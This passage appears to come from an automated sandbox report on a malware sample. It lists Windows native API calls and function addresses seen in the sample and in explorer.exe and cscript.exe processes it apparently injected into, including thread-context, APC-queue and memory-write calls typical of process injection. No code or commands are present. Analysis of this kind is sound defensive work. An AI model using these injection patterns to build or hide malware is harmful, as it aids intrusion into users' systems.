          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01844260 NtSetContextThread,5_2_01844260
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01844570 NtSuspendThread,5_2_01844570
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018434E0 NtCreateMutant,5_2_018434E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018429D0 NtWaitForSingleObject,5_2_018429D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018438D0 NtGetContextThread,5_2_018438D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842B80 NtCreateKey,5_2_01842B80
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842BE0 NtQueryVirtualMemory,5_2_01842BE0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842B00 NtQueryValueKey,5_2_01842B00
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842B20 NtQueryInformationProcess,5_2_01842B20
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842AA0 NtQueryInformationFile,5_2_01842AA0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842AC0 NtEnumerateValueKey,5_2_01842AC0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842A10 NtWriteFile,5_2_01842A10
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842D50 NtWriteVirtualMemory,5_2_01842D50
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01843C90 NtOpenThread,5_2_01843C90
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842CD0 NtEnumerateKey,5_2_01842CD0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842C10 NtOpenProcess,5_2_01842C10
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842C20 NtSetInformationFile,5_2_01842C20
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01843C30 NtOpenProcessToken,5_2_01843C30
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842FB0 NtSetValueKey,5_2_01842FB0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842F30 NtOpenDirectoryObject,5_2_01842F30
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842E80 NtCreateProcessEx,5_2_01842E80
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842EC0 NtQuerySection,5_2_01842EC0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842E00 NtQueueApcThread,5_2_01842E00
          Source: C:\Windows\explorer.exeCode function: 6_2_13972E12 NtProtectVirtualMemory,6_2_13972E12
          Source: C:\Windows\explorer.exeCode function: 6_2_13971232 NtCreateFile,6_2_13971232
          Source: C:\Windows\explorer.exeCode function: 6_2_13972E0A NtProtectVirtualMemory,6_2_13972E0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F34E0 NtCreateMutant,LdrInitializeThunk,7_2_051F34E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2D10 NtQuerySystemInformation,LdrInitializeThunk,7_2_051F2D10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_051F2DC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2C30 NtMapViewOfSection,LdrInitializeThunk,7_2_051F2C30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2CF0 NtDelayExecution,LdrInitializeThunk,7_2_051F2CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2F00 NtCreateFile,LdrInitializeThunk,7_2_051F2F00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2E50 NtCreateSection,LdrInitializeThunk,7_2_051F2E50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F29F0 NtReadFile,LdrInitializeThunk,7_2_051F29F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_051F2B10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2B00 NtQueryValueKey,LdrInitializeThunk,7_2_051F2B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2B90 NtFreeVirtualMemory,LdrInitializeThunk,7_2_051F2B90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2B80 NtCreateKey,LdrInitializeThunk,7_2_051F2B80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2BC0 NtQueryInformationToken,LdrInitializeThunk,7_2_051F2BC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2A80 NtClose,LdrInitializeThunk,7_2_051F2A80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F4570 NtSuspendThread,7_2_051F4570
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F4260 NtSetContextThread,7_2_051F4260
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2D50 NtWriteVirtualMemory,7_2_051F2D50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2DA0 NtReadVirtualMemory,7_2_051F2DA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2C10 NtOpenProcess,7_2_051F2C10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F3C30 NtOpenProcessToken,7_2_051F3C30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2C20 NtSetInformationFile,7_2_051F2C20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2C50 NtUnmapViewOfSection,7_2_051F2C50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F3C90 NtOpenThread,7_2_051F3C90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2CD0 NtEnumerateKey,7_2_051F2CD0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2F30 NtOpenDirectoryObject,7_2_051F2F30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2FB0 NtSetValueKey,7_2_051F2FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2E00 NtQueueApcThread,7_2_051F2E00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2E80 NtCreateProcessEx,7_2_051F2E80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2EB0 NtProtectVirtualMemory,7_2_051F2EB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2ED0 NtResumeThread,7_2_051F2ED0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2EC0 NtQuerySection,7_2_051F2EC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F29D0 NtWaitForSingleObject,7_2_051F29D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F38D0 NtGetContextThread,7_2_051F38D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2B20 NtQueryInformationProcess,7_2_051F2B20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2BE0 NtQueryVirtualMemory,7_2_051F2BE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2A10 NtWriteFile,7_2_051F2A10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2AA0 NtQueryInformationFile,7_2_051F2AA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F2AC0 NtEnumerateValueKey,7_2_051F2AC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301A360 NtCreateFile,7_2_0301A360
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301A540 NtAllocateVirtualMemory,7_2_0301A540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301A410 NtReadFile,7_2_0301A410
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301A490 NtClose,7_2_0301A490
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301A53A NtAllocateVirtualMemory,7_2_0301A53A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301A48A NtClose,7_2_0301A48A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 3_2_015C04D43_2_015C04D4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 3_2_015C86D83_2_015C86D8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 3_2_015C5F213_2_015C5F21
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 3_2_015C11103_2_015C1110
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 3_2_015CD3B03_2_015CD3B0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 3_2_06C642C83_2_06C642C8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 3_2_06C63E903_2_06C63E90
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 3_2_06C63E7F3_2_06C63E7F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 3_2_06C618D83_2_06C618D8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 3_2_06C61D103_2_06C61D10
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 3_2_06C639283_2_06C63928
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041E8215_2_0041E821
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041E41F5_2_0041E41F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041ED6C5_2_0041ED6C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_00402D875_2_00402D87
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041D5A65_2_0041D5A6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041E5AF5_2_0041E5AF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_00409E605_2_00409E60
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018151C05_2_018151C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182B1E05_2_0182B1E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF1135_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D010E5_2_018D010E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AD1305_2_018AD130
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0185717A5_2_0185717A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0184508C5_2_0184508C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018000A05_2_018000A0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181B0D05_2_0181B0D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C70F15_2_018C70F1
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BE0765_2_018BE076
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018013805_2_01801380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181E3105_2_0181E310
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CF3305_2_018CF330
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017D22455_2_017D2245
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FD2EC5_2_017FD2EC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C124C5_2_018C124C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CF5C95_2_018CF5C9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C75C65_2_018C75C6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DA5265_2_018DA526
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187D4805_2_0187D480
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018104455_2_01810445
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C67575_2_018C6757
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018127605_2_01812760
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181A7605_2_0181A760
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018106805_2_01810680
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CA6C05_2_018CA6C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180C6E05_2_0180C6E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018836EC5_2_018836EC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CF6F65_2_018CF6F6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182C6005_2_0182C600
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AD62C5_2_018AD62C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BD6465_2_018BD646
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018346705_2_01834670
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180E9A05_2_0180E9A0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CE9A65_2_018CE9A6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018559C05_2_018559C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017D99E85_2_017D99E8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018268825_2_01826882
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F68685_2_017F6868
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018898B25_2_018898B2
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018128C05_2_018128C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C18DA5_2_018C18DA
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C78F35_2_018C78F3
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018138005_2_01813800
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E8105_2_0183E810
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018B08355_2_018B0835
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018198705_2_01819870
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182B8705_2_0182B870
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CF8725_2_018CF872
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01884BC05_2_01884BC0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01810B105_2_01810B10
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0184DB195_2_0184DB19
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CFB2E5_2_018CFB2E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CFA895_2_018CFA89
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182FAA05_2_0182FAA0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CCA135_2_018CCA13
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CEA5B5_2_018CEA5B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01822DB05_2_01822DB0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01819DD05_2_01819DD0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AFDF45_2_018AFDF4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180AD005_2_0180AD00
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CFD275_2_018CFD27
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C7D4C5_2_018C7D4C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01810D695_2_01810D69
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018A9C985_2_018A9C98
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01828CDF5_2_01828CDF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182FCE05_2_0182FCE0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DACEB5_2_018DACEB
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01800C125_2_01800C12
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181AC205_2_0181AC20
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BEC4C5_2_018BEC4C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01813C605_2_01813C60
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C6C695_2_018C6C69
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CEC605_2_018CEC60
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CEFBF5_2_018CEFBF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C1FC65_2_018C1FC6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01816FE05_2_01816FE0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181CF005_2_0181CF00
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CFF635_2_018CFF63
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C0EAD5_2_018C0EAD
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01811EB25_2_01811EB2
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C9ED25_2_018C9ED2
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01802EE85_2_01802EE8
          Source: C:\Windows\explorer.exeCode function: 6_2_110D6D026_2_110D6D02
          Source: C:\Windows\explorer.exeCode function: 6_2_110DC9126_2_110DC912
          Source: C:\Windows\explorer.exeCode function: 6_2_110E25CD6_2_110E25CD
          Source: C:\Windows\explorer.exeCode function: 6_2_110DE0366_2_110DE036
          Source: C:\Windows\explorer.exeCode function: 6_2_110D50826_2_110D5082
          Source: C:\Windows\explorer.exeCode function: 6_2_110D9B306_2_110D9B30
          Source: C:\Windows\explorer.exeCode function: 6_2_110D9B326_2_110D9B32
          Source: C:\Windows\explorer.exeCode function: 6_2_110DF2326_2_110DF232
          Source: C:\Windows\explorer.exeCode function: 6_2_1167CD026_2_1167CD02
          Source: C:\Windows\explorer.exeCode function: 6_2_116829126_2_11682912
          Source: C:\Windows\explorer.exeCode function: 6_2_116885CD6_2_116885CD
          Source: C:\Windows\explorer.exeCode function: 6_2_116840366_2_11684036
          Source: C:\Windows\explorer.exeCode function: 6_2_1167B0826_2_1167B082
          Source: C:\Windows\explorer.exeCode function: 6_2_1167FB326_2_1167FB32
          Source: C:\Windows\explorer.exeCode function: 6_2_1167FB306_2_1167FB30
          Source: C:\Windows\explorer.exeCode function: 6_2_116852326_2_11685232
          Source: C:\Windows\explorer.exeCode function: 6_2_139712326_2_13971232
          Source: C:\Windows\explorer.exeCode function: 6_2_139745CD6_2_139745CD
          Source: C:\Windows\explorer.exeCode function: 6_2_1396E9126_2_1396E912
          Source: C:\Windows\explorer.exeCode function: 6_2_13968D026_2_13968D02
          Source: C:\Windows\explorer.exeCode function: 6_2_1396BB326_2_1396BB32
          Source: C:\Windows\explorer.exeCode function: 6_2_1396BB306_2_1396BB30
          Source: C:\Windows\explorer.exeCode function: 6_2_139670826_2_13967082
          Source: C:\Windows\explorer.exeCode function: 6_2_139700366_2_13970036
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_004071107_2_00407110
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0528A5267_2_0528A526
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_052775C67_2_052775C6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527F5C97_2_0527F5C9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C04457_2_051C0445
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0522D4807_2_0522D480
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_052767577_2_05276757
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C27607_2_051C2760
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051CA7607_2_051CA760
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0525D62C7_2_0525D62C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051DC6007_2_051DC600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0526D6467_2_0526D646
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051E46707_2_051E4670
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C06807_2_051C0680
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_052336EC7_2_052336EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527F6F67_2_0527F6F6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527A6C07_2_0527A6C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051BC6E07_2_051BC6E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051AF1137_2_051AF113
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0525D1307_2_0525D130
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0528010E7_2_0528010E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0520717A7_2_0520717A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C51C07_2_051C51C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051DB1E07_2_051DB1E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0526E0767_2_0526E076
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051F508C7_2_051F508C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051B00A07_2_051B00A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051CB0D07_2_051CB0D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_052770F17_2_052770F1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051CE3107_2_051CE310
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527F3307_2_0527F330
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051B13807_2_051B1380
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051822457_2_05182245
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527124C7_2_0527124C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051AD2EC7_2_051AD2EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527FD277_2_0527FD27
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051BAD007_2_051BAD00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_05277D4C7_2_05277D4C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C0D697_2_051C0D69
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051D2DB07_2_051D2DB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C9DD07_2_051C9DD0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0525FDF47_2_0525FDF4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051B0C127_2_051B0C12
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051CAC207_2_051CAC20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527EC607_2_0527EC60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_05276C697_2_05276C69
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0526EC4C7_2_0526EC4C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C3C607_2_051C3C60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_05259C987_2_05259C98
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051D8CDF7_2_051D8CDF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0528ACEB7_2_0528ACEB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_05247CE87_2_05247CE8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051DFCE07_2_051DFCE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051CCF007_2_051CCF00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527FF637_2_0527FF63
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527EFBF7_2_0527EFBF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_05271FC67_2_05271FC6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C6FE07_2_051C6FE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_05260E6D7_2_05260E6D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051E0E507_2_051E0E50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_05202E487_2_05202E48
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_05270EAD7_2_05270EAD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C1EB27_2_051C1EB2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051B2EE87_2_051B2EE8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_05279ED27_2_05279ED2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527E9A67_2_0527E9A6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051BE9A07_2_051BE9A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_052059C07_2_052059C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051899E87_2_051899E8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051EE8107_2_051EE810
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_052608357_2_05260835
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C38007_2_051C3800
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_052358707_2_05235870
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527F8727_2_0527F872
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C98707_2_051C9870
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051DB8707_2_051DB870
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051A68687_2_051A6868
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_052398B27_2_052398B2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051D68827_2_051D6882
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_052778F37_2_052778F3
